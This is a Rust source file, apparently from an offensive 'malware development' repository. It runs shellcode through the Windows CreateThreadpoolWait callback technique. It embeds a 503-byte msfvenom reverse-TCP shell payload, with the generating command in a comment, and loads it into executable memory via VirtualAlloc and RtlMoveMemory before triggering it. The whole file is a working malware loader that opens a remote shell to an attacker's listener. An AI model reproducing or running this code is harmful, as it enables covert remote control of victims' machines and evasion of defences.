/*
    Shellcode Execution via CreateThreadpoolWait
    For More Codes: https://github.com/Whitecat18/Rust-for-Malware-Development.git
    Resources Used: https://www.ired.team/offensive-security/code-injection-process-injection/shellcode-execution-via-createthreadpoolwait
    @5mukx
*/

use std::ptr::null_mut;

use winapi::um::{
    errhandlingapi::GetLastError, 
    handleapi::CloseHandle, 
    memoryapi::{VirtualAlloc, VirtualFree}, 
    synchapi::{CreateEventA, WaitForSingleObject}, 
    threadpoolapiset::{CloseThreadpool, CreateThreadpoolWait}, 
    winnt::{MEM_COMMIT, PAGE_EXECUTE_READWRITE,RtlMoveMemory,TP_POOL}
};


macro_rules! okey {
    ($msg:expr, $($arg:expr), *) => {
        println!("\\____[+] {}", format!($msg, $($arg), *));
    }
}

macro_rules! error {
    ($msg:expr, $($arg:expr), *) => {
        println!("\\____[-] {}", format!($msg, $($arg), *));
        println!("Exiting...");
        std::process::exit(0);
    }
}

fn main(){

    // msfvenom -> msfvenom -p windows/x64/shell_reverse_tcp LHOST=eth0 LPORT=443 -f rust -b \x00\x0a\x0d
        let buf: [u8; 503] = [0x48,0x31,0xc9,0x48,0x81,0xe9,0xc6,
    0xff,0xff,0xff,0x48,0x8d,0x05,0xef,0xff,0xff,0xff,0x48,0xbb,
    0x55,0x17,0xce,0x4b,0x6d,0xac,0xd4,0x2b,0x48,0x31,0x58,0x27,
    0x48,0x2d,0xf8,0xff,0xff,0xff,0xe2,0xf4,0xa9,0x5f,0x4d,0xaf,
    0x9d,0x44,0x14,0x2b,0x55,0x17,0x8f,0x1a,0x2c,0xfc,0x86,0x7a,
    0x03,0x5f,0xff,0x99,0x08,0xe4,0x5f,0x79,0x35,0x5f,0x45,0x19,
    0x75,0xe4,0x5f,0x79,0x75,0x5f,0x45,0x39,0x3d,0xe4,0xdb,0x9c,
    0x1f,0x5d,0x83,0x7a,0xa4,0xe4,0xe5,0xeb,0xf9,0x2b,0xaf,0x37,
    0x6f,0x80,0xf4,0x6a,0x94,0xde,0xc3,0x0a,0x6c,0x6d,0x36,0xc6,
    0x07,0x56,0x9f,0x03,0xe6,0xfe,0xf4,0xa0,0x17,0x2b,0x86,0x4a,
    0xbd,0x27,0x54,0xa3,0x55,0x17,0xce,0x03,0xe8,0x6c,0xa0,0x4c,
    0x1d,0x16,0x1e,0x1b,0xe6,0xe4,0xcc,0x6f,0xde,0x57,0xee,0x02,
    0x6c,0x7c,0x37,0x7d,0x1d,0xe8,0x07,0x0a,0xe6,0x98,0x5c,0x63,
    0x54,0xc1,0x83,0x7a,0xa4,0xe4,0xe5,0xeb,0xf9,0x56,0x0f,0x82,
    0x60,0xed,0xd5,0xea,0x6d,0xf7,0xbb,0xba,0x21,0xaf,0x98,0x0f,
    0x5d,0x52,0xf7,0x9a,0x18,0x74,0x8c,0x6f,0xde,0x57,0xea,0x02,
    0x6c,0x7c,0xb2,0x6a,0xde,0x1b,0x86,0x0f,0xe6,0xec,0xc8,0x62,
    0x54,0xc7,0x8f,0xc0,0x69,0x24,0x9c,0x2a,0x85,0x56,0x96,0x0a,
    0x35,0xf2,0x8d,0x71,0x14,0x4f,0x8f,0x12,0x2c,0xf6,0x9c,0xa8,
    0xb9,0x37,0x8f,0x19,0x92,0x4c,0x8c,0x6a,0x0c,0x4d,0x86,0xc0,
    0x7f,0x45,0x83,0xd4,0xaa,0xe8,0x93,0x02,0xd3,0xdb,0xa7,0x19,
    0x0a,0x24,0xfc,0x4b,0x6d,0xed,0x82,0x62,0xdc,0xf1,0x86,0xca,
    0x81,0x0c,0xd5,0x2b,0x55,0x5e,0x47,0xae,0x24,0x10,0xd6,0x2b,
    0x54,0xac,0x0e,0xe3,0x6c,0xe7,0x95,0x7f,0x1c,0x9e,0x2a,0x07,
    0xe4,0x5d,0x95,0x91,0x19,0x60,0xe8,0x4c,0x92,0x79,0x98,0xa2,
    0xbf,0x7f,0xcf,0x4a,0x6d,0xac,0x8d,0x6a,0xef,0x3e,0x4e,0x20,
    0x6d,0x53,0x01,0x7b,0x05,0x5a,0xff,0x82,0x20,0x9d,0x14,0x63,
    0xaa,0xd7,0x86,0xc2,0xaf,0xe4,0x2b,0xeb,0x1d,0x9e,0x0f,0x0a,
    0xd7,0x46,0xdb,0xf4,0xb5,0xe8,0x1b,0x03,0xe4,0x6b,0xbe,0x3b,
    0x14,0x4f,0x82,0xc2,0x8f,0xe4,0x5d,0xd2,0x14,0xad,0x57,0xee,
    0x19,0xcd,0x2b,0xfe,0x1d,0x96,0x0a,0x0b,0x6f,0xac,0xd4,0x62,
    0xed,0x74,0xa3,0x2f,0x6d,0xac,0xd4,0x2b,0x55,0x56,0x9e,0x0a,
    0x3d,0xe4,0x5d,0xc9,0x02,0x40,0x99,0x06,0x5c,0x6c,0xbe,0x26,
    0x0c,0x56,0x9e,0xa9,0x91,0xca,0x13,0x6f,0x71,0x43,0xcf,0x4a,
    0x25,0x21,0x90,0x0f,0x4d,0xd1,0xce,0x23,0x25,0x25,0x32,0x7d,
    0x05,0x56,0x9e,0x0a,0x3d,0xed,0x84,0x62,0xaa,0xd7,0x8f,0x1b,
    0x24,0x53,0x1c,0x66,0xdc,0xd6,0x82,0xc2,0xac,0xed,0x6e,0x52,
    0x99,0x28,0x48,0xb4,0xb8,0xe4,0xe5,0xf9,0x1d,0xe8,0x04,0xc0,
    0x63,0xed,0x6e,0x23,0xd2,0x0a,0xae,0xb4,0xb8,0x17,0x24,0x9e,
    0xf7,0x41,0x8f,0xf1,0xcb,0x39,0x69,0xb6,0xaa,0xc2,0x86,0xc8,
    0xa9,0x84,0xe8,0x2d,0x29,0x1d,0x4e,0xb0,0x8d,0xd9,0xd1,0x90,
    0x12,0x04,0xbc,0x24,0x07,0xac,0x8d,0x6a,0xdc,0xcd,0x31,0x9e,
    0x6d,0xac,0xd4,0x2b];

    unsafe{
        let event = CreateEventA(
            null_mut(),
            0,
            1,
            null_mut(),
        );

        if event.is_null(){
            error!(" CreateEvent Error : {:?}",event);
        }
        
        okey!("CreateEvent Address : {:?}",event);
    
        let shell_address = VirtualAlloc(
            null_mut(),
            buf.len(),
            MEM_COMMIT,
            PAGE_EXECUTE_READWRITE,
        );

        if shell_address.is_null(){
            error!("VirtualAlloc Error : {:?}", GetLastError()); 
        }

        okey!("VirtualAlloc Addr :{:?}",shell_address);

        // You can use these two copy methods ..!

        RtlMoveMemory(shell_address, buf.as_ptr() as _, buf.len());

        // std::ptr::copy(buf.as_ptr() as _, shell_address, buf.len());
        //  import function to use -> winapi::um::threadpoolapiset::CreateThreadpoolWait
        // let poolwait = CreateThread
        
        let thread_pool_weight = CreateThreadpoolWait(
            std::mem::transmute(shell_address), 
            null_mut(),
            null_mut());
        
        if thread_pool_weight.is_null(){
            error!("Error at ThreadPool : {:?}",GetLastError());
        }

        okey!("CreateThreadPool : {:?}",thread_pool_weight);

        okey!("Executing shellcode {}", "!");
        winapi::um::threadpoolapiset::SetThreadpoolWait(
            thread_pool_weight, 
            event, 
            null_mut()
        );
        

        WaitForSingleObject(event, 
            0xFFFFFFFF // INFINITE
        );
        
        CloseHandle(event);
        CloseThreadpool(thread_pool_weight as *mut TP_POOL);
        VirtualFree(shell_address, 0, 0x8000); // 0x8000 -> MEM_RELEASE
        
    }
}

